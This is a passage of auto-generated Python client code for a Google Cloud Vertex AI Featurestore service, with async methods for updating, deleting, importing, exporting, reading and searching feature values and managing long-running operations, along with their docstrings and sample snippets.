# This method is paged; wrap the response in a pager, which provides
# an `__aiter__` convenience method.
response = pagers.ListFeaturesAsyncPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
async def update_feature(
self,
request: Optional[
Union[featurestore_service.UpdateFeatureRequest, dict]
] = None,
*,
feature: Optional[gca_feature.Feature] = None,
update_mask: Optional[field_mask_pb2.FieldMask] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gca_feature.Feature:
r"""Updates the parameters of a single Feature.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_update_feature():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
feature = aiplatform_v1beta1.Feature()
feature.value_type = "BYTES"
request = aiplatform_v1beta1.UpdateFeatureRequest(
feature=feature,
)
# Make the request
response = await client.update_feature(request=request)
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.UpdateFeatureRequest, dict]]):
The request object. Request message for
[FeaturestoreService.UpdateFeature][google.cloud.aiplatform.v1beta1.FeaturestoreService.UpdateFeature].
feature (:class:`google.cloud.aiplatform_v1beta1.types.Feature`):
Required. The Feature's ``name`` field is used to
identify the Feature to be updated. Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}/entityTypes/{entity_type}/features/{feature}``
This corresponds to the ``feature`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (:class:`google.protobuf.field_mask_pb2.FieldMask`):
Field mask is used to specify the fields to be
overwritten in the Features resource by the update. The
fields specified in the update_mask are relative to the
resource, not the full request. A field will be
overwritten if it is in the mask. If the user does not
provide a mask then only the non-empty fields present in
the request will be overwritten. Set the update_mask to
``*`` to override all fields.
Updatable fields:
- ``description``
- ``labels``
- ``disable_monitoring``
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1beta1.types.Feature:
Feature Metadata information that
describes an attribute of an entity
type. For example, apple is an entity
type, and color is a feature that
describes apple.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([feature, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.UpdateFeatureRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if feature is not None:
request.feature = feature
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.update_feature,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("feature.name", request.feature.name),)
),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def delete_feature(
self,
request: Optional[
Union[featurestore_service.DeleteFeatureRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Deletes a single Feature.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_delete_feature():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.DeleteFeatureRequest(
name="name_value",
)
# Make the request
operation = client.delete_feature(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.DeleteFeatureRequest, dict]]):
The request object. Request message for
[FeaturestoreService.DeleteFeature][google.cloud.aiplatform.v1beta1.FeaturestoreService.DeleteFeature].
name (:class:`str`):
Required. The name of the Features to be deleted.
Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}/entityTypes/{entity_type}/features/{feature}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.DeleteFeatureRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.delete_feature,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
empty_pb2.Empty,
metadata_type=gca_operation.DeleteOperationMetadata,
)
# Done; return the response.
return response
async def import_feature_values(
self,
request: Optional[
Union[featurestore_service.ImportFeatureValuesRequest, dict]
] = None,
*,
entity_type: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Imports Feature values into the Featurestore from a
source storage.
The progress of the import is tracked by the returned
operation. The imported features are guaranteed to be
visible to subsequent read operations after the
operation is marked as successfully done.
If an import operation fails, the Feature values
returned from reads and exports may be inconsistent. If
consistency is required, the caller must retry the same
import request again and wait till the new operation
returned is marked as successfully done.
There are also scenarios where the caller can cause
inconsistency.
- Source data for import contains multiple distinct
Feature values for the same entity ID and
timestamp.
- Source is modified during an import. This includes
adding, updating, or removing source data and/or
metadata. Examples of updating metadata include but
are not limited to changing storage location, storage
class, or retention policy.
- Online serving cluster is under-provisioned.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_import_feature_values():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
avro_source = aiplatform_v1beta1.AvroSource()
avro_source.gcs_source.uris = ['uris_value1', 'uris_value2']
feature_specs = aiplatform_v1beta1.FeatureSpec()
feature_specs.id = "id_value"
request = aiplatform_v1beta1.ImportFeatureValuesRequest(
avro_source=avro_source,
feature_time_field="feature_time_field_value",
entity_type="entity_type_value",
feature_specs=feature_specs,
)
# Make the request
operation = client.import_feature_values(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.ImportFeatureValuesRequest, dict]]):
The request object. Request message for
[FeaturestoreService.ImportFeatureValues][google.cloud.aiplatform.v1beta1.FeaturestoreService.ImportFeatureValues].
entity_type (:class:`str`):
Required. The resource name of the EntityType grouping
the Features for which values are being imported.
Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}/entityTypes/{entityType}``
This corresponds to the ``entity_type`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.aiplatform_v1beta1.types.ImportFeatureValuesResponse` Response message for
[FeaturestoreService.ImportFeatureValues][google.cloud.aiplatform.v1beta1.FeaturestoreService.ImportFeatureValues].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([entity_type])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.ImportFeatureValuesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if entity_type is not None:
request.entity_type = entity_type
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.import_feature_values,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("entity_type", request.entity_type),)
),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
featurestore_service.ImportFeatureValuesResponse,
metadata_type=featurestore_service.ImportFeatureValuesOperationMetadata,
)
# Done; return the response.
return response
async def batch_read_feature_values(
self,
request: Optional[
Union[featurestore_service.BatchReadFeatureValuesRequest, dict]
] = None,
*,
featurestore: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Batch reads Feature values from a Featurestore.
This API enables batch reading Feature values, where
each read instance in the batch may read Feature values
of entities from one or more EntityTypes. Point-in-time
correctness is guaranteed for Feature values of each
read instance as of each instance's read timestamp.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_batch_read_feature_values():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
csv_read_instances = aiplatform_v1beta1.CsvSource()
csv_read_instances.gcs_source.uris = ['uris_value1', 'uris_value2']
destination = aiplatform_v1beta1.FeatureValueDestination()
destination.bigquery_destination.output_uri = "output_uri_value"
entity_type_specs = aiplatform_v1beta1.EntityTypeSpec()
entity_type_specs.entity_type_id = "entity_type_id_value"
entity_type_specs.feature_selector.id_matcher.ids = ['ids_value1', 'ids_value2']
request = aiplatform_v1beta1.BatchReadFeatureValuesRequest(
csv_read_instances=csv_read_instances,
featurestore="featurestore_value",
destination=destination,
entity_type_specs=entity_type_specs,
)
# Make the request
operation = client.batch_read_feature_values(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.BatchReadFeatureValuesRequest, dict]]):
The request object. Request message for
[FeaturestoreService.BatchReadFeatureValues][google.cloud.aiplatform.v1beta1.FeaturestoreService.BatchReadFeatureValues].
featurestore (:class:`str`):
Required. The resource name of the Featurestore from
which to query Feature values. Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}``
This corresponds to the ``featurestore`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.aiplatform_v1beta1.types.BatchReadFeatureValuesResponse` Response message for
[FeaturestoreService.BatchReadFeatureValues][google.cloud.aiplatform.v1beta1.FeaturestoreService.BatchReadFeatureValues].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([featurestore])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.BatchReadFeatureValuesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if featurestore is not None:
request.featurestore = featurestore
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.batch_read_feature_values,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("featurestore", request.featurestore),)
),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
featurestore_service.BatchReadFeatureValuesResponse,
metadata_type=featurestore_service.BatchReadFeatureValuesOperationMetadata,
)
# Done; return the response.
return response
async def export_feature_values(
self,
request: Optional[
Union[featurestore_service.ExportFeatureValuesRequest, dict]
] = None,
*,
entity_type: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Exports Feature values from all the entities of a
target EntityType.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_export_feature_values():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
destination = aiplatform_v1beta1.FeatureValueDestination()
destination.bigquery_destination.output_uri = "output_uri_value"
feature_selector = aiplatform_v1beta1.FeatureSelector()
feature_selector.id_matcher.ids = ['ids_value1', 'ids_value2']
request = aiplatform_v1beta1.ExportFeatureValuesRequest(
entity_type="entity_type_value",
destination=destination,
feature_selector=feature_selector,
)
# Make the request
operation = client.export_feature_values(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.ExportFeatureValuesRequest, dict]]):
The request object. Request message for
[FeaturestoreService.ExportFeatureValues][google.cloud.aiplatform.v1beta1.FeaturestoreService.ExportFeatureValues].
entity_type (:class:`str`):
Required. The resource name of the EntityType from which
to export Feature values. Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}/entityTypes/{entity_type}``
This corresponds to the ``entity_type`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.aiplatform_v1beta1.types.ExportFeatureValuesResponse` Response message for
[FeaturestoreService.ExportFeatureValues][google.cloud.aiplatform.v1beta1.FeaturestoreService.ExportFeatureValues].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([entity_type])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.ExportFeatureValuesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if entity_type is not None:
request.entity_type = entity_type
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.export_feature_values,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("entity_type", request.entity_type),)
),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
featurestore_service.ExportFeatureValuesResponse,
metadata_type=featurestore_service.ExportFeatureValuesOperationMetadata,
)
# Done; return the response.
return response
async def delete_feature_values(
self,
request: Optional[
Union[featurestore_service.DeleteFeatureValuesRequest, dict]
] = None,
*,
entity_type: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Delete Feature values from Featurestore.
The progress of the deletion is tracked by the returned
operation. The deleted feature values are guaranteed to
be invisible to subsequent read operations after the
operation is marked as successfully done.
If a delete feature values operation fails, the feature
values returned from reads and exports may be
inconsistent. If consistency is required, the caller
must retry the same delete request again and wait till
the new operation returned is marked as successfully
done.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_delete_feature_values():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
select_entity = aiplatform_v1beta1.SelectEntity()
select_entity.entity_id_selector.csv_source.gcs_source.uris = ['uris_value1', 'uris_value2']
request = aiplatform_v1beta1.DeleteFeatureValuesRequest(
select_entity=select_entity,
entity_type="entity_type_value",
)
# Make the request
operation = client.delete_feature_values(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.DeleteFeatureValuesRequest, dict]]):
The request object. Request message for
[FeaturestoreService.DeleteFeatureValues][google.cloud.aiplatform.v1beta1.FeaturestoreService.DeleteFeatureValues].
entity_type (:class:`str`):
Required. The resource name of the EntityType grouping
the Features for which values are being deleted from.
Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}/entityTypes/{entityType}``
This corresponds to the ``entity_type`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.aiplatform_v1beta1.types.DeleteFeatureValuesResponse` Response message for
[FeaturestoreService.DeleteFeatureValues][google.cloud.aiplatform.v1beta1.FeaturestoreService.DeleteFeatureValues].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([entity_type])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.DeleteFeatureValuesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if entity_type is not None:
request.entity_type = entity_type
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.delete_feature_values,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("entity_type", request.entity_type),)
),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
featurestore_service.DeleteFeatureValuesResponse,
metadata_type=featurestore_service.DeleteFeatureValuesOperationMetadata,
)
# Done; return the response.
return response
async def search_features(
self,
request: Optional[
Union[featurestore_service.SearchFeaturesRequest, dict]
] = None,
*,
location: Optional[str] = None,
query: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.SearchFeaturesAsyncPager:
r"""Searches Features matching a query in a given
project.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_search_features():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.SearchFeaturesRequest(
location="location_value",
)
# Make the request
page_result = client.search_features(request=request)
# Handle the response
async for response in page_result:
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.SearchFeaturesRequest, dict]]):
The request object. Request message for
[FeaturestoreService.SearchFeatures][google.cloud.aiplatform.v1beta1.FeaturestoreService.SearchFeatures].
location (:class:`str`):
Required. The resource name of the Location to search
Features. Format:
``projects/{project}/locations/{location}``
This corresponds to the ``location`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
query (:class:`str`):
Query string that is a conjunction of field-restricted
queries and/or field-restricted filters.
Field-restricted queries and filters can be combined
using ``AND`` to form a conjunction.
A field query is in the form FIELD:QUERY. This
implicitly checks if QUERY exists as a substring within
Feature's FIELD. The QUERY and the FIELD are converted
to a sequence of words (i.e. tokens) for comparison.
This is done by:
- Removing leading/trailing whitespace and tokenizing
the search value. Characters that are not one of
alphanumeric ``[a-zA-Z0-9]``, underscore ``_``, or
asterisk ``*`` are treated as delimiters for tokens.
``*`` is treated as a wildcard that matches
characters within a token.
- Ignoring case.
- Prepending an asterisk to the first and appending an
asterisk to the last token in QUERY.
A QUERY must be either a singular token or a phrase. A
phrase is one or multiple words enclosed in double
quotation marks ("). With phrases, the order of the
words is important. Words in the phrase must be matching
in order and consecutively.
Supported FIELDs for field-restricted queries:
- ``feature_id``
- ``description``
- ``entity_type_id``
Examples:
- ``feature_id: foo`` --> Matches a Feature with ID
containing the substring ``foo`` (eg. ``foo``,
``foofeature``, ``barfoo``).
- ``feature_id: foo*feature`` --> Matches a Feature
with ID containing the substring ``foo*feature`` (eg.
``foobarfeature``).
- ``feature_id: foo AND description: bar`` --> Matches
a Feature with ID containing the substring ``foo``
and description containing the substring ``bar``.
Besides field queries, the following exact-match filters
are supported. The exact-match filters do not support
wildcards. Unlike field-restricted queries, exact-match
filters are case-sensitive.
- ``feature_id``: Supports = comparisons.
- ``description``: Supports = comparisons. Multi-token
filters should be enclosed in quotes.
- ``entity_type_id``: Supports = comparisons.
- ``value_type``: Supports = and != comparisons.
- ``labels``: Supports key-value equality as well as
key presence.
- ``featurestore_id``: Supports = comparisons.
Examples:
- ``description = "foo bar"`` --> Any Feature with
description exactly equal to ``foo bar``
- ``value_type = DOUBLE`` --> Features whose type is
DOUBLE.
- ``labels.active = yes AND labels.env = prod`` -->
Features having both (active: yes) and (env: prod)
labels.
- ``labels.env: *`` --> Any Feature which has a label
with ``env`` as the key.
This corresponds to the ``query`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1beta1.services.featurestore_service.pagers.SearchFeaturesAsyncPager:
Response message for
[FeaturestoreService.SearchFeatures][google.cloud.aiplatform.v1beta1.FeaturestoreService.SearchFeatures].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([location, query])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.SearchFeaturesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if location is not None:
request.location = location
if query is not None:
request.query = query
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.search_features,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("location", request.location),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__aiter__` convenience method.
response = pagers.SearchFeaturesAsyncPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
async def list_operations(
self,
request: Optional[operations_pb2.ListOperationsRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operations_pb2.ListOperationsResponse:
r"""Lists operations that match the specified filter in the request.
Args:
request (:class:`~.operations_pb2.ListOperationsRequest`):
The request object. Request message for
`ListOperations` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.operations_pb2.ListOperationsResponse:
Response message for ``ListOperations`` method.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = operations_pb2.ListOperationsRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._client._transport.list_operations,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def get_operation(
self,
request: Optional[operations_pb2.GetOperationRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operations_pb2.Operation:
r"""Gets the latest state of a long-running operation.
Args:
request (:class:`~.operations_pb2.GetOperationRequest`):
The request object. Request message for
`GetOperation` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.operations_pb2.Operation:
An ``Operation`` object.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = operations_pb2.GetOperationRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._client._transport.get_operation,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def delete_operation(
self,
request: Optional[operations_pb2.DeleteOperationRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Deletes a long-running operation.
This method indicates that the client is no longer interested
in the operation result. It does not cancel the operation.
If the server doesn't support this method, it returns
`google.rpc.Code.UNIMPLEMENTED`.
Args:
request (:class:`~.operations_pb2.DeleteOperationRequest`):
The request object. Request message for
`DeleteOperation` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
None
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = operations_pb2.DeleteOperationRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._client._transport.delete_operation,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
async def cancel_operation(
self,
request: Optional[operations_pb2.CancelOperationRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
